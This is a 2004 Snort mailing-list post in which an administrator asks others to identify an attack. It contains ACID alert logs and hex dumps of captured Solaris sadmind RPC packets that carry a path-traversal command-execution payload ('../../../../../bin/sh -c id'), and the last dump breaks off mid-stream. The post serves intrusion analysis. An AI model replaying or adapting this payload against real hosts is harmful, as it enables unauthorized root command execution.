Snort mailing list archives
Suspicious Traffic
From: "ISP Toolz" <kevin () isptoolz com>
Date: Thu, 24 Jun 2004 20:25:52 -0400
Have any of you seen any traffic similar to this, or do you know what exploit or script was used to try and overflow this system? Thanks.

Generated by ACID v0.9.6b23 on Thu, 24 Jun 2004 02:46:20 -0400
------------------------------------------------------------------------------
#(1 - 33320) [2004-06-21 12:33:33] [snort/2256] RPC sadmind query with root credentials attempt UDP
IPv4: 207.36.196.39 -> 68.82.247.65 hlen=5 TOS=0 dlen=1476 ID=14454 flags=0 offset=0 TTL=49 chksum=15571
UDP: port=60730 -> dport: 32770 len=1456
Payload: length = 1448
------------------------------------------------------------------------------
#(1 - 33321) [2004-06-21 12:33:37] [snort/2256] RPC sadmind query with root credentials attempt UDP
IPv4: 207.36.196.39 -> 68.82.247.65 hlen=5 TOS=0 dlen=1476 ID=14863 flags=0 offset=0 TTL=49 chksum=15162
UDP: port=60732 -> dport: 32771 len=1456
Payload: length = 1448
------------------------------------------------------------------------------
#(1 - 33322) [2004-06-21 12:33:42] [snort/2256] RPC sadmind query with root credentials attempt UDP
IPv4: 207.36.196.39 -> 68.82.247.65 hlen=5 TOS=0 dlen=1476 ID=15355 flags=0 offset=0 TTL=49 chksum=14670
UDP: port=60734 -> dport: 32772 len=1456
Payload: length = 1448
------------------------------------------------------------------------------
#(1 - 33323) [2004-06-21 12:33:46] [snort/2256] RPC sadmind query with root credentials attempt UDP
IPv4: 207.36.196.39 -> 68.82.247.65 hlen=5 TOS=0 dlen=1476 ID=15774 flags=0 offset=0 TTL=49 chksum=14251
UDP: port=60736 -> dport: 32773 len=1456
Payload: length = 1448
------------------------------------------------------------------------------
#(1 - 33324) [2004-06-21 12:33:50] [snort/2256] RPC sadmind query with root credentials attempt UDP
IPv4: 207.36.196.39 -> 68.82.247.65 hlen=5 TOS=0 dlen=1476 ID=16185 flags=0 offset=0 TTL=49 chksum=13840
UDP: port=60738 -> dport: 32774 len=1456
Payload: length = 1448
------------------------------------------------------------------------------
#(1 - 33325) [2004-06-21 12:33:54] [snort/2256] RPC sadmind query with root credentials attempt UDP
IPv4: 207.36.196.39 -> 68.82.247.65 hlen=5 TOS=0 dlen=1476 ID=16594 flags=0 offset=0 TTL=49 chksum=13431
UDP: port=60738 -> dport: 32775 len=1456
Payload: length = 1448
230 : 00 00 00 00 00 00 00 00 00 00 00 08 41 44 4D 5F ............ADM_ 240 : 48 4F 53 54 00 00 00 09 00 00 00 3C 00 00 00 3B HOST.......<...; 250 : 65 78 70 6C 6F 69 74 00 00 00 00 00 00 00 00 00 exploit......... 260 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 270 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 280 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 290 : 00 00 00 00 00 00 00 0F 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE 2a0 : 4E 54 5F 48 4F 53 54 00 00 00 00 09 00 00 00 08 NT_HOST......... 2b0 : 00 00 00 07 65 78 70 6C 6F 69 74 00 00 00 00 00 ....exploit..... 2c0 : 00 00 00 00 00 00 00 11 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE 2d0 : 4E 54 5F 44 4F 4D 41 49 4E 00 00 00 00 00 00 09 NT_DOMAIN....... 2e0 : 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 ................ 2f0 : 00 00 00 11 41 44 4D 5F 54 49 4D 45 4F 55 54 5F ....ADM_TIMEOUT_ 300 : 50 41 52 4D 53 00 00 00 00 00 00 09 00 00 00 1C PARMS........... 310 : 00 00 00 1B 54 54 4C 3D 30 20 50 54 4F 3D 32 30 ....TTL=0 PTO=20 320 : 20 50 43 4E 54 3D 32 20 50 44 4C 59 3D 33 30 00 PCNT=2 PDLY=30. 330 : 00 00 00 00 00 00 00 00 00 00 00 09 41 44 4D 5F ............ADM_ 340 : 46 45 4E 43 45 00 00 00 00 00 00 09 00 00 00 00 FENCE........... 350 : 00 00 00 00 00 00 00 00 00 00 00 01 58 00 00 00 ............X... 360 : 00 00 00 09 00 00 00 03 00 00 00 02 2D 63 00 00 ............-c.. 370 : 00 00 00 00 00 00 00 00 00 00 00 01 59 00 00 00 ............Y... 380 : 00 00 00 09 00 00 02 01 00 00 02 00 69 64 00 00 ............id.. 390 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 
3f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 400 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 420 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 430 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 440 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 450 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 460 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 470 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 480 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 490 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 500 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 510 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 520 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 530 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 540 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 550 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 560 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 570 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 580 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 
590 : 00 00 00 00 00 00 00 10 6E 65 74 6D 67 74 5F 65 ........netmgt_e 5a0 : 6E 64 6F 66 61 72 67 73 ndofargs ------------------------------------------------------------------------------ #(1 - 33326) [2004-06-21 12:33:55] [snort/2256] RPC sadmind query with root credentials attempt UDP IPv4: 207.36.196.39 -> 68.82.247.65 hlen=5 TOS=0 dlen=1476 ID=16622 flags=0 offset=0 TTL=49 chksum=13403 UDP: port=60738 -> dport: 32776 len=1456 Payload: length = 1448 000 : D4 4B 93 A1 00 00 00 00 00 00 00 02 00 01 87 88 .K.............. 010 : 00 00 00 0A 00 00 00 01 00 00 00 01 00 00 00 1C ................ 020 : 40 D7 86 9B 00 00 00 07 65 78 70 6C 6F 69 74 00 @.......exploit. 030 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 040 : 00 00 00 00 40 D7 86 9F 00 07 45 DF 00 00 00 00 ....@.....E..... 050 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 060 : 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 ................ 070 : 00 00 00 04 00 00 00 00 00 00 00 04 7F 00 00 01 ............... 080 : 00 01 87 88 00 00 00 0A 00 00 00 04 7F 00 00 01 ............... 090 : 00 01 87 88 00 00 00 0A 00 00 00 11 00 00 00 1E ................ 0a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0b0 : 00 00 00 3B 65 78 70 6C 6F 69 74 00 00 00 00 00 ...;exploit..... 0c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0f0 : 00 00 00 06 73 79 73 74 65 6D 00 00 00 00 00 15 ....system...... 100 : 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 62 ../../../../../b 110 : 69 6E 2F 73 68 00 00 00 00 00 04 1A 00 00 00 0E in/sh........... 120 : 41 44 4D 5F 46 57 5F 56 45 52 53 49 4F 4E 00 00 ADM_FW_VERSION.. 130 : 00 00 00 03 00 00 00 04 00 00 00 01 00 00 00 00 ................ 
140 : 00 00 00 00 00 00 00 08 41 44 4D 5F 4C 41 4E 47 ........ADM_LANG 150 : 00 00 00 09 00 00 00 02 00 00 00 01 43 00 00 00 ............C... 160 : 00 00 00 00 00 00 00 00 00 00 00 0D 41 44 4D 5F ............ADM_ 170 : 52 45 51 55 45 53 54 49 44 00 00 00 00 00 00 09 REQUESTID....... 180 : 00 00 00 12 00 00 00 11 30 38 31 30 3A 31 30 31 ........0810:101 190 : 30 31 30 31 30 31 30 3A 31 00 00 00 00 00 00 00 0101010:1....... 1a0 : 00 00 00 00 00 00 00 09 41 44 4D 5F 43 4C 41 53 ........ADM_CLAS 1b0 : 53 00 00 00 00 00 00 09 00 00 00 07 00 00 00 06 S............... 1c0 : 73 79 73 74 65 6D 00 00 00 00 00 00 00 00 00 00 system.......... 1d0 : 00 00 00 0E 41 44 4D 5F 43 4C 41 53 53 5F 56 45 ....ADM_CLASS_VE 1e0 : 52 53 00 00 00 00 00 09 00 00 00 04 00 00 00 03 RS.............. 1f0 : 32 2E 31 00 00 00 00 00 00 00 00 00 00 00 00 0A 2.1............. 200 : 41 44 4D 5F 4D 45 54 48 4F 44 00 00 00 00 00 09 ADM_METHOD...... 210 : 00 00 00 16 00 00 00 15 2E 2E 2F 2E 2E 2F 2E 2E ........../../.. 220 : 2F 2E 2E 2F 2E 2E 2F 62 69 6E 2F 73 68 00 00 00 /../../bin/sh... 230 : 00 00 00 00 00 00 00 00 00 00 00 08 41 44 4D 5F ............ADM_ 240 : 48 4F 53 54 00 00 00 09 00 00 00 3C 00 00 00 3B HOST.......<...; 250 : 65 78 70 6C 6F 69 74 00 00 00 00 00 00 00 00 00 exploit......... 260 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 270 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 280 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 290 : 00 00 00 00 00 00 00 0F 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE 2a0 : 4E 54 5F 48 4F 53 54 00 00 00 00 09 00 00 00 08 NT_HOST......... 2b0 : 00 00 00 07 65 78 70 6C 6F 69 74 00 00 00 00 00 ....exploit..... 2c0 : 00 00 00 00 00 00 00 11 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE 2d0 : 4E 54 5F 44 4F 4D 41 49 4E 00 00 00 00 00 00 09 NT_DOMAIN....... 2e0 : 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 ................ 
2f0 : 00 00 00 11 41 44 4D 5F 54 49 4D 45 4F 55 54 5F ....ADM_TIMEOUT_ 300 : 50 41 52 4D 53 00 00 00 00 00 00 09 00 00 00 1C PARMS........... 310 : 00 00 00 1B 54 54 4C 3D 30 20 50 54 4F 3D 32 30 ....TTL=0 PTO=20 320 : 20 50 43 4E 54 3D 32 20 50 44 4C 59 3D 33 30 00 PCNT=2 PDLY=30. 330 : 00 00 00 00 00 00 00 00 00 00 00 09 41 44 4D 5F ............ADM_ 340 : 46 45 4E 43 45 00 00 00 00 00 00 09 00 00 00 00 FENCE........... 350 : 00 00 00 00 00 00 00 00 00 00 00 01 58 00 00 00 ............X... 360 : 00 00 00 09 00 00 00 03 00 00 00 02 2D 63 00 00 ............-c.. 370 : 00 00 00 00 00 00 00 00 00 00 00 01 59 00 00 00 ............Y... 380 : 00 00 00 09 00 00 02 01 00 00 02 00 69 64 00 00 ............id.. 390 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 400 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 420 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 430 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 440 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 450 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 460 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 470 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 480 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 490 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 
4b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 500 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 510 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 520 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 530 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 540 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 550 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 560 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 570 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 580 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 590 : 00 00 00 00 00 00 00 10 6E 65 74 6D 67 74 5F 65 ........netmgt_e 5a0 : 6E 64 6F 66 61 72 67 73 ndofargs ------------------------------------------------------------------------------ #(1 - 33327) [2004-06-21 12:33:55] [snort/2256] RPC sadmind query with root credentials attempt UDP IPv4: 207.36.196.39 -> 68.82.247.65 hlen=5 TOS=0 dlen=1476 ID=16640 flags=0 offset=0 TTL=49 chksum=13385 UDP: port=60738 -> dport: 32777 len=1456 Payload: length = 1448 000 : FB 12 4F C0 00 00 00 00 00 00 00 02 00 01 87 88 ..O............. 010 : 00 00 00 0A 00 00 00 01 00 00 00 01 00 00 00 1C ................ 020 : 40 D7 86 9B 00 00 00 07 65 78 70 6C 6F 69 74 00 @.......exploit. 030 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 040 : 00 00 00 00 40 D7 86 9F 00 07 45 DF 00 00 00 00 ....@.....E..... 050 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 060 : 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 ................ 
070 : 00 00 00 04 00 00 00 00 00 00 00 04 7F 00 00 01 ............... 080 : 00 01 87 88 00 00 00 0A 00 00 00 04 7F 00 00 01 ............... 090 : 00 01 87 88 00 00 00 0A 00 00 00 11 00 00 00 1E ................ 0a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0b0 : 00 00 00 3B 65 78 70 6C 6F 69 74 00 00 00 00 00 ...;exploit..... 0c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0f0 : 00 00 00 06 73 79 73 74 65 6D 00 00 00 00 00 15 ....system...... 100 : 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 62 ../../../../../b 110 : 69 6E 2F 73 68 00 00 00 00 00 04 1A 00 00 00 0E in/sh........... 120 : 41 44 4D 5F 46 57 5F 56 45 52 53 49 4F 4E 00 00 ADM_FW_VERSION.. 130 : 00 00 00 03 00 00 00 04 00 00 00 01 00 00 00 00 ................ 140 : 00 00 00 00 00 00 00 08 41 44 4D 5F 4C 41 4E 47 ........ADM_LANG 150 : 00 00 00 09 00 00 00 02 00 00 00 01 43 00 00 00 ............C... 160 : 00 00 00 00 00 00 00 00 00 00 00 0D 41 44 4D 5F ............ADM_ 170 : 52 45 51 55 45 53 54 49 44 00 00 00 00 00 00 09 REQUESTID....... 180 : 00 00 00 12 00 00 00 11 30 38 31 30 3A 31 30 31 ........0810:101 190 : 30 31 30 31 30 31 30 3A 31 00 00 00 00 00 00 00 0101010:1....... 1a0 : 00 00 00 00 00 00 00 09 41 44 4D 5F 43 4C 41 53 ........ADM_CLAS 1b0 : 53 00 00 00 00 00 00 09 00 00 00 07 00 00 00 06 S............... 1c0 : 73 79 73 74 65 6D 00 00 00 00 00 00 00 00 00 00 system.......... 1d0 : 00 00 00 0E 41 44 4D 5F 43 4C 41 53 53 5F 56 45 ....ADM_CLASS_VE 1e0 : 52 53 00 00 00 00 00 09 00 00 00 04 00 00 00 03 RS.............. 1f0 : 32 2E 31 00 00 00 00 00 00 00 00 00 00 00 00 0A 2.1............. 200 : 41 44 4D 5F 4D 45 54 48 4F 44 00 00 00 00 00 09 ADM_METHOD...... 210 : 00 00 00 16 00 00 00 15 2E 2E 2F 2E 2E 2F 2E 2E ........../../.. 220 : 2F 2E 2E 2F 2E 2E 2F 62 69 6E 2F 73 68 00 00 00 /../../bin/sh... 
230 : 00 00 00 00 00 00 00 00 00 00 00 08 41 44 4D 5F ............ADM_ 240 : 48 4F 53 54 00 00 00 09 00 00 00 3C 00 00 00 3B HOST.......<...; 250 : 65 78 70 6C 6F 69 74 00 00 00 00 00 00 00 00 00 exploit......... 260 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 270 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 280 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 290 : 00 00 00 00 00 00 00 0F 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE 2a0 : 4E 54 5F 48 4F 53 54 00 00 00 00 09 00 00 00 08 NT_HOST......... 2b0 : 00 00 00 07 65 78 70 6C 6F 69 74 00 00 00 00 00 ....exploit..... 2c0 : 00 00 00 00 00 00 00 11 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE 2d0 : 4E 54 5F 44 4F 4D 41 49 4E 00 00 00 00 00 00 09 NT_DOMAIN....... 2e0 : 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 ................ 2f0 : 00 00 00 11 41 44 4D 5F 54 49 4D 45 4F 55 54 5F ....ADM_TIMEOUT_ 300 : 50 41 52 4D 53 00 00 00 00 00 00 09 00 00 00 1C PARMS........... 310 : 00 00 00 1B 54 54 4C 3D 30 20 50 54 4F 3D 32 30 ....TTL=0 PTO=20 320 : 20 50 43 4E 54 3D 32 20 50 44 4C 59 3D 33 30 00 PCNT=2 PDLY=30. 330 : 00 00 00 00 00 00 00 00 00 00 00 09 41 44 4D 5F ............ADM_ 340 : 46 45 4E 43 45 00 00 00 00 00 00 09 00 00 00 00 FENCE........... 350 : 00 00 00 00 00 00 00 00 00 00 00 01 58 00 00 00 ............X... 360 : 00 00 00 09 00 00 00 03 00 00 00 02 2D 63 00 00 ............-c.. 370 : 00 00 00 00 00 00 00 00 00 00 00 01 59 00 00 00 ............Y... 380 : 00 00 00 09 00 00 02 01 00 00 02 00 69 64 00 00 ............id.. 390 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 
3f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 400 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 420 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 430 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 440 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 450 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 460 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 470 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 480 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 490 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 500 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 510 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 520 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 530 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 540 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 550 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 560 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 570 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 580 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 
590 : 00 00 00 00 00 00 00 10 6E 65 74 6D 67 74 5F 65 ........netmgt_e 5a0 : 6E 64 6F 66 61 72 67 73 ndofargs ------------------------------------------------------------------------------ #(1 - 33328) [2004-06-21 12:33:55] [snort/2256] RPC sadmind query with root credentials attempt UDP IPv4: 207.36.196.39 -> 68.82.247.65 hlen=5 TOS=0 dlen=1476 ID=16659 flags=0 offset=0 TTL=49 chksum=13366 UDP: port=60738 -> dport: 32778 len=1456 Payload: length = 1448 000 : 90 4B 10 2A 00 00 00 00 00 00 00 02 00 01 87 88 .K.*............ 010 : 00 00 00 0A 00 00 00 01 00 00 00 01 00 00 00 1C ................ 020 : 40 D7 86 9B 00 00 00 07 65 78 70 6C 6F 69 74 00 @.......exploit. 030 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 040 : 00 00 00 00 40 D7 86 9F 00 07 45 DF 00 00 00 00 ....@.....E..... 050 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 060 : 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 ................ 070 : 00 00 00 04 00 00 00 00 00 00 00 04 7F 00 00 01 ............... 080 : 00 01 87 88 00 00 00 0A 00 00 00 04 7F 00 00 01 ............... 090 : 00 01 87 88 00 00 00 0A 00 00 00 11 00 00 00 1E ................ 0a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0b0 : 00 00 00 3B 65 78 70 6C 6F 69 74 00 00 00 00 00 ...;exploit..... 0c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0f0 : 00 00 00 06 73 79 73 74 65 6D 00 00 00 00 00 15 ....system...... 100 : 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 62 ../../../../../b 110 : 69 6E 2F 73 68 00 00 00 00 00 04 1A 00 00 00 0E in/sh........... 120 : 41 44 4D 5F 46 57 5F 56 45 52 53 49 4F 4E 00 00 ADM_FW_VERSION.. 130 : 00 00 00 03 00 00 00 04 00 00 00 01 00 00 00 00 ................ 
140 : 00 00 00 00 00 00 00 08 41 44 4D 5F 4C 41 4E 47 ........ADM_LANG 150 : 00 00 00 09 00 00 00 02 00 00 00 01 43 00 00 00 ............C... 160 : 00 00 00 00 00 00 00 00 00 00 00 0D 41 44 4D 5F ............ADM_ 170 : 52 45 51 55 45 53 54 49 44 00 00 00 00 00 00 09 REQUESTID....... 180 : 00 00 00 12 00 00 00 11 30 38 31 30 3A 31 30 31 ........0810:101 190 : 30 31 30 31 30 31 30 3A 31 00 00 00 00 00 00 00 0101010:1....... 1a0 : 00 00 00 00 00 00 00 09 41 44 4D 5F 43 4C 41 53 ........ADM_CLAS 1b0 : 53 00 00 00 00 00 00 09 00 00 00 07 00 00 00 06 S............... 1c0 : 73 79 73 74 65 6D 00 00 00 00 00 00 00 00 00 00 system.......... 1d0 : 00 00 00 0E 41 44 4D 5F 43 4C 41 53 53 5F 56 45 ....ADM_CLASS_VE 1e0 : 52 53 00 00 00 00 00 09 00 00 00 04 00 00 00 03 RS.............. 1f0 : 32 2E 31 00 00 00 00 00 00 00 00 00 00 00 00 0A 2.1............. 200 : 41 44 4D 5F 4D 45 54 48 4F 44 00 00 00 00 00 09 ADM_METHOD...... 210 : 00 00 00 16 00 00 00 15 2E 2E 2F 2E 2E 2F 2E 2E ........../../.. 220 : 2F 2E 2E 2F 2E 2E 2F 62 69 6E 2F 73 68 00 00 00 /../../bin/sh... 230 : 00 00 00 00 00 00 00 00 00 00 00 08 41 44 4D 5F ............ADM_ 240 : 48 4F 53 54 00 00 00 09 00 00 00 3C 00 00 00 3B HOST.......<...; 250 : 65 78 70 6C 6F 69 74 00 00 00 00 00 00 00 00 00 exploit......... 260 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 270 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 280 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 290 : 00 00 00 00 00 00 00 0F 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE 2a0 : 4E 54 5F 48 4F 53 54 00 00 00 00 09 00 00 00 08 NT_HOST......... 2b0 : 00 00 00 07 65 78 70 6C 6F 69 74 00 00 00 00 00 ....exploit..... 2c0 : 00 00 00 00 00 00 00 11 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE 2d0 : 4E 54 5F 44 4F 4D 41 49 4E 00 00 00 00 00 00 09 NT_DOMAIN....... 2e0 : 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 ................ 
2f0 : 00 00 00 11 41 44 4D 5F 54 49 4D 45 4F 55 54 5F ....ADM_TIMEOUT_ 300 : 50 41 52 4D 53 00 00 00 00 00 00 09 00 00 00 1C PARMS........... 310 : 00 00 00 1B 54 54 4C 3D 30 20 50 54 4F 3D 32 30 ....TTL=0 PTO=20 320 : 20 50 43 4E 54 3D 32 20 50 44 4C 59 3D 33 30 00 PCNT=2 PDLY=30. 330 : 00 00 00 00 00 00 00 00 00 00 00 09 41 44 4D 5F ............ADM_ 340 : 46 45 4E 43 45 00 00 00 00 00 00 09 00 00 00 00 FENCE........... 350 : 00 00 00 00 00 00 00 00 00 00 00 01 58 00 00 00 ............X... 360 : 00 00 00 09 00 00 00 03 00 00 00 02 2D 63 00 00 ............-c.. 370 : 00 00 00 00 00 00 00 00 00 00 00 01 59 00 00 00 ............Y... 380 : 00 00 00 09 00 00 02 01 00 00 02 00 69 64 00 00 ............id.. 390 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3f0 : 00 00 00 00 